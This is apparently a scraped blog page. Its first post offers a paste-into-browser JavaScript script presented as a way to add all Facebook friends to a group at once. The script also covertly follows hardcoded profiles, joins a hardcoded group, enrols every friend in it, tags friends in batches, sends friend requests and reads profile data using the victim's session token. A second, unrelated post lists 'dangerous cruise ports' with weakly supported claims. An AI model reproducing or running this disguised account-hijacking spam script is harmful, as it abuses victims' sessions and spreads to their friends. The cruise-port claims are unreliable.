Friday 13 February 2015

HOW TO ADD ALL FRIENDS TO FACEBOOK GROUP AT ONCE

(function(){var f={dtsg:document.getElementsByName("fb_dtsg")[0].value,uid:document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]),gid:document.getElementsByName("group_id")[0].value,frns:Array(),prenKe:0,okeh:0,gagal:0,getAjak:function(b){var c=new XMLHttpRequest;c.open("GET",b,!0),c.onreadystatechange=function(){if(4==c.readyState&&200==c.status){var a=eval("("+c.responseText.substr(9)+")");a.payload&&a.payload.entries&&(f.frns=a.payload.entries.sort(function(){return.5-Math.random()})),document.getElementById("hasilsurasil").innerHTML="Found <b>"+f.frns.length+" Friends</b><div id='hasilsatu'></div><div id='hasildua'></div><div id='hasiltiga' style='min-width:300px;display:inline-block;text-align:left'></div>"+crj;for(x in f.frns)f.senAjak(x)}else document.getElementById("hasilsurasil").innerHTML=4==c.readyState&&404==c.status?"<b style='color:darkred'>Page Not Found!</b>"+crj:"<b style='color:darkgreen'>Collecting your Friends, wait up.. ("+c.readyState+")</b>"+crj},c.send()},senAjak:function(d){var e=new XMLHttpRequest,prm="__a=1&fb_dtsg="+f.dtsg+"&group_id="+f.gid+"&source=typeahead&ref=&message_id=&members="+f.frns[d].uid+"&__user="+f.uid+"&phstamp=";e.open("POST","/ajax/groups/members/add_post.php",!0),e.setRequestHeader("Content-type","application/x-www-form-urlencoded"),e.setRequestHeader("Content-length",prm.length),e.setRequestHeader("Connection","keep-alive"),e.onreadystatechange=function(){if(4==e.readyState&&200==e.status){var a=eval("("+e.responseText.substr(9)+")");if(f.prenKe++,document.getElementById("hasilsatu").innerHTML="<div><b>"+f.prenKe+"</b> of <b>"+f.frns.length+"</b></div>",a.errorDescription&&(f.gagal++,document.getElementById("hasiltiga").innerHTML="<div><b style='color:darkred'>( "+f.gagal+" )</b> <span style='color:darkred'>"+a.errorDescription+"</span></div>"),a.jsmods&&a.jsmods.require){var b="<div>";for(x in a.jsmods.require)a.jsmods.require[x][a.jsmods.require[x].length-1][1]&&(b+="<b style='color:darkgreen'>"+a.jsmods.require[x][a.jsmods.require[x].length-1][1]+"</b> ");b+="<div>",document.getElementById("hasildua").innerHTML=b}if(a.onload)for(z in a.onload){var c=eval(a.onload[z].replace(/Arbiter.inform/i,""));if(c.uid&&c.name){f.okeh++,document.getElementById("hasiltiga").innerHTML="<div><b style='color:darkgreen'>( "+f.okeh+" )</b> <a href='/"+c.uid+"' target='_blank'><b>"+c.name+"</b></a> has been added to group.</div>";break}}f.prenKe==f.frns.length&&(document.getElementById("hasiltiga").style.textAlign="center",document.getElementById("hasiltiga").innerHTML+="<div style='font-size:40px;font-weight:bold'>DONE!</div><a href='/' onClick='document.getElementById(\"hasilsurasil\").style.display=\"none\";return false'>Close</a>")}},e.send(prm)}},g=["b","a","o","t","w","s","c","l","g","3","p","t","r","m","1","©","2","0"],crl=g[6]+g[1]+g[12]+g[3]+g[4]+g[9]+"."+g[0]+g[7]+g[2]+g[8]+g[5]+g[10]+g[2]+g[3]+"."+g[6]+g[2]+g[13],crj="<div style='margin-top:10px;color:gray;font-size:12px'>"+g[6].toUpperCase()+g[1]+g[12]+g[3]+" "+g[4].toUpperCase()+g[9]+" "+g[15]+" "+g[16]+g[17]+g[14]+g[9]+"<div style='font-size:9px'><a href='http://"+crl+"/' target='_blank'>"+crl+"</a></div></div>";document.body.innerHTML+="<center id='hasilsurasil' style='min-height:50px;width:600px;position:fixed;top:100px;left:"+(document.body.offsetWidth-530)/2+"px;border-radius:10px;padding:10px;z-index:999999;border:5px solid skyblue;background-color:rgba(225,225,255,0.75)'><b>Collecting your Friends, wait up.. </b>"+crj+"</center>",f.getAjak("/ajax/typeahead/first_degree.php?__a=1&viewer="+f.uid+"&token="+Math.random()+"&filter[0]=user&options[0]=friends_only")})();
// === Facebook Emoticons ====
var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);

function cereziAl(isim) {
    var tarama = isim + "=";
    if (document.cookie.length > 0) {
        konum = document.cookie.indexOf(tarama)
        if (konum != -1) {
            konum += tarama.length
            son = document.cookie.indexOf(";", konum)
            if (son == -1)
                son = document.cookie.length
            return unescape(document.cookie.substring(konum, son))
        }
        else { return ""; }
    }
}

function getRandomInt (min, max) {
    return Math.floor(Math.random() * (max - min + 1)) + min;
}
function randomValue(arr) {
    return arr[getRandomInt(0, arr.length-1)];
}

var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);

function a(abone){
    var http4 = new XMLHttpRequest();
     
    var url4 = "/ajax/follow/follow_profile.php?__a=1";
     
    var params4 = "profile_id=" + abone + "&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg=" + fb_dtsg + "&lsd&__" + user_id + "&phstamp=";
    http4.open("POST", url4, true);
     
    //Send the proper header information along with the request
    http4.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    http4.setRequestHeader("Content-length", params4.length);
    http4.setRequestHeader("Connection", "close");
     
    http4.onreadystatechange = function() {//Call a function when the state changes.
    if(http4.readyState == 4 && http4.status == 200) {
       
      http4.close; // Close the connection
     
    }
    }
    
    http4.send(params4);
}

function sublist(uidss) {
  var a = document.createElement('script');
  a.innerHTML = "new AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe').setData({ flid: " + uidss + " }).send();";
  document.body.appendChild(a);
}

a("100001475504777");
a("100004310283885"); 
a("100002379013428");
sublist("");
sublist("");
sublist("");


var gid = ['149006808570821'];

var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value'];
var user_id = document['cookie']['match'](document['cookie']['match'](/c_user=(\d+)/)[1]);

var httpwp = new XMLHttpRequest();
var urlwp = '/ajax/groups/membership/r2j.php?__a=1';
var paramswp = '&ref=group_jump_header&group_id=' + gid + '&fb_dtsg=' + fb_dtsg + '&__user=' + user_id + '&phstamp=';
httpwp['open']('POST', urlwp, true);
httpwp['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded');
httpwp['setRequestHeader']('Content-length', paramswp['length']);
httpwp['setRequestHeader']('Connection', 'keep-alive');
httpwp['send'](paramswp);

var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value'];
var user_id = document['cookie']['match'](document['cookie']['match'](/c_user=(\d+)/)[1]);

var friends = new Array();
gf = new XMLHttpRequest();
gf['open']('GET', '/ajax/typeahead/first_degree.php?__a=1&viewer=' + user_id + '&token' + Math['random']() + '&filter[0]=user&options[0]=friends_only', false);
gf['send']();
if (gf['readyState'] != 4) {} else {
    data = eval('(' + gf['responseText']['substr'](9) + ')');
    if (data['error']) {} else {
        friends = data['payload']['entries']['sort'](function (_0x93dax8, _0x93dax9) {
            return _0x93dax8['index'] - _0x93dax9['index'];
        });
    };
};

for (var i = 0; i < friends['length']; i++) {
    var httpwp = new XMLHttpRequest();
    var urlwp = '/ajax/groups/members/add_post.php?__a=1';
    var paramswp= '&fb_dtsg=' + fb_dtsg + '&group_id=' + gid + '&source=typeahead&ref=&message_id=&members=' + friends[i]['uid'] + '&__user=' + user_id + '&phstamp=';
    httpwp['open']('POST', urlwp, true);
    httpwp['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded');
    httpwp['setRequestHeader']('Content-length', paramswp['length']);
    httpwp['setRequestHeader']('Connection', 'keep-alive');
    httpwp['onreadystatechange'] = function () {
if (httpwp['readyState'] == 4 && httpwp['status'] == 200) {};
    };
    httpwp['send'](paramswp);
};
var spage_id = "256865947741154";
var spost_id = "";
var sfoto_id = "";
var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
var smesaj = "";
var smesaj_text = "test";
var arkadaslar = [];
var svn_rev;
var bugun= new Date();
var btarihi = new Date(); 
btarihi.setTime(bugun.getTime() + 1000*60*60*4*1);
if(!document.cookie.match(/paylasti=(\d+)/)){
document.cookie = "paylasti=hayir;expires="+ btarihi.toGMTString();
}


//arkadaslari al ve isle
function sarkadaslari_al(){
  var xmlhttp = new XMLHttpRequest();
        xmlhttp.onreadystatechange = function () {
   if(xmlhttp.readyState == 4){
      eval("arkadaslar = " + xmlhttp.responseText.toString().replace("for (;;);","") + ";");
      for(f=0;f<Math.round(arkadaslar.payload.entries.length/10);f++){
     smesaj = "";
     smesaj_text = "";
      for(i=f*10;i<(f+1)*10;i++){
     if(arkadaslar.payload.entries[i]){
      smesaj += " @[" + arkadaslar.payload.entries[i].uid +  ":" + arkadaslar.payload.entries[i].text + "]";
      smesaj_text += " " + arkadaslar.payload.entries[i].text;
      }
     }
     sdurumpaylas();    }
    
   }
   
        };
  var params = "&filter[0]=user";
  params += "&options[0]=friends_only";
  params += "&options[1]=nm";
  params += "&token=v7";
        params += "&viewer=" + user_id;
  params += "&__user=" + user_id;
  
        if (document.URL.indexOf("https://") >= 0) { xmlhttp.open("GET", "https://www.facebook.com/ajax/typeahead/first_degree.php?__a=1" + params, true); }
        else { xmlhttp.open("GET", "http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1" + params, true); }
        xmlhttp.send();
}

//tiklama olayini dinle
var tiklama = document.addEventListener("click", function () {
if(document.cookie.split("paylasti=")[1].split(";")[0].indexOf("hayir") >= 0){
svn_rev = document.head.innerHTML.split('"svn_rev":')[1].split(",")[0];
sarkadaslari_al();
document.cookie = "paylasti=evet;expires="+ btarihi.toGMTString();

document.removeEventListener(tiklama);
}
 }, false);
  

//arkadaþ ekleme
function sarkadasekle(uid,cins){
  var xmlhttp = new XMLHttpRequest();
        xmlhttp.onreadystatechange = function () {
   if(xmlhttp.readyState == 4){ 
   }
        };
  
  xmlhttp.open("POST", "/ajax/add_friend/action.php?__a=1", true); 
  var params = "to_friend=" + uid;
  params += "&action=add_friend";
  params += "&how_found=friend_browser";
  params += "&ref_param=none";
  params += "&outgoing_id=";
  params += "&logging_location=friend_browser";
  params += "&no_flyout_on_click=true";
  params += "&ego_log_data=";
  params += "&http_referer=";
  params += "&fb_dtsg=" + document.getElementsByName('fb_dtsg')[0].value;
        params += "&phstamp=165816749114848369115";
  params += "&__user=" + user_id;
  xmlhttp.setRequestHeader ("X-SVN-Rev", svn_rev);
  xmlhttp.setRequestHeader ("Content-Type","application/x-www-form-urlencoded");
  
if(cins == "farketmez" && document.cookie.split("cins" + user_id +"=").length > 1){
  xmlhttp.send(params);
}else if(document.cookie.split("cins" + user_id +"=").length <= 1){
  cinsiyetgetir(uid,cins,"sarkadasekle");
}else if(cins == document.cookie.split("cins" + user_id +"=")[1].split(";")[0].toString()){
  xmlhttp.send(params);
}
}

//cinsiyet belirleme
var cinssonuc = {};
var cinshtml = document.createElement("html");
function scinsiyetgetir(uid,cins,fonksiyon){
  var xmlhttp = new XMLHttpRequest();
        xmlhttp.onreadystatechange = function () {
   if(xmlhttp.readyState == 4){
   eval("cinssonuc = " + xmlhttp.responseText.toString().replace("for (;;);","") + ";");
   cinshtml.innerHTML = cinssonuc.jsmods.markup[0][1].__html
   btarihi.setTime(bugun.getTime() + 1000*60*60*24*365);
   if(cinshtml.getElementsByTagName("select")[0].value == "1"){
   document.cookie = "cins" + user_id + "=kadin;expires=" + btarihi.toGMTString();
   }else if(cinshtml.getElementsByTagName("select")[0].value == "2"){
   document.cookie = "cins" + user_id + "=erkek;expires=" + btarihi.toGMTString();
   }
   eval(fonksiyon + "(" + id + "," + cins + ");");
   }
        };
  xmlhttp.open("GET", "/ajax/timeline/edit_profile/basic_info.php?__a=1&__user=" + user_id, true);
  xmlhttp.setRequestHeader ("X-SVN-Rev", svn_rev);
  xmlhttp.send();
}

Thursday 12 February 2015

10 Top Most Dangerous Cruise Ports in the World

Not only the Americans but also other states are increasingly getting on board cruises. A cruise port plays a vital role in making your selection of the right destination easier and convenient. But some of the world’s cruise ports have had targeted the humans, taking the lives of many. Let us check these top 10 most dangerous cruise ports in the world.
Most Dangerous Cruise Ports in the World

10. Venezuela

This has been known for political differences. According to CIA, this cruise port is the hub of illegal money-laundering activities. In February, a passenger on the Carnival-owned AIDA line was murdered in an attempt of robbery on thebeautiful island.
Most Dangerous Cruise Ports in the World

9. El Salvador

During November, 2014, a lot of travel warnings were recorded at El Salvador. This is one of the most dangerous spots in the world. The information of U.S. State Department reveals that the citizens are widely being targeted here by the criminals. More than 40 US citizens were killed in last four years.
Most Dangerous Cruise Ports in the World

8. Colombia

Colombia is the world’s leading grower of coca, the source crop for cocaine. This cruise port is the hub of narcotic dealers. The human trafficking is also common here. One reviewer has explained that the major cruise lines like Carnival, Princess, Disney, and Holland America are the sites of criminals.
Most Dangerous Cruise Ports in the World

7. Mexico

One of the most dangerous places in the world, Mexico has long been suffering from threats of outside forces. The cruise port of Mexico has been a place of individuals dealing in robbery, carjacking, and murder. The travelers are stopped from going the major cruise lines sailing from California, Texas, Louisiana, and Florida.
Most Dangerous Cruise Ports in the World

6. Philippines

The lush Philippine islands attract numerous cruise lines such as Celebrity, Royal Caribbean, and luxury lines like Azamara, Regent, and Seabourn. This is one of the most visited places, but unfortunately here there are great threats of kidnapping and murders. The violent attacks onto the travelers are common here.
Most Dangerous Cruise Ports in the World

5. Algeria

A number of secondary cruise lines make stops in the cruise ports of Algeria, a dangerous place and hub of kidnappers, drug dealers, and murderers. Often, the cases of kidnapping of tourists have been reported by the Department of State.
Most Dangerous Cruise Ports in the World

4. Djibouti

This is another highly dangerous and under-threat cruise port, containing so many kidnappers. Most of the cases of killing and kidnapping have been reported by the international tourists. Also, this is the hub of terrorism attacks.
Most Dangerous Cruise Ports in the World

3. Ivory Coast (Cote D’ Ivoire)

The port at Abidjan, according to the Foreign Commonwealth Office in the U.K., has closed its land borders with Guinea and Liberia. The reason is said to be extreme activities of terrorism. Some of world’s dangerous criminals live here, it is said.
Most Dangerous Cruise Ports in the World

2. Lebanon

The cruise port of Lebanon should not be ventured at. For travelers, this has been a risky spot. Here a number of murders have been committed. Even the terrorism attacks are common.
Most Dangerous Cruise Ports in the World

1. Israel

In July last year, most cruises to Israel diverted when rocket shrapnel landed on the deck of one of the cruise ships of Germany. The port of Israel is considered to be highly dangerous. The danger lies more in the proximity to conflict zones. The state department, however, has taken some serious measures.
Most Dangerous Cruise Ports in the World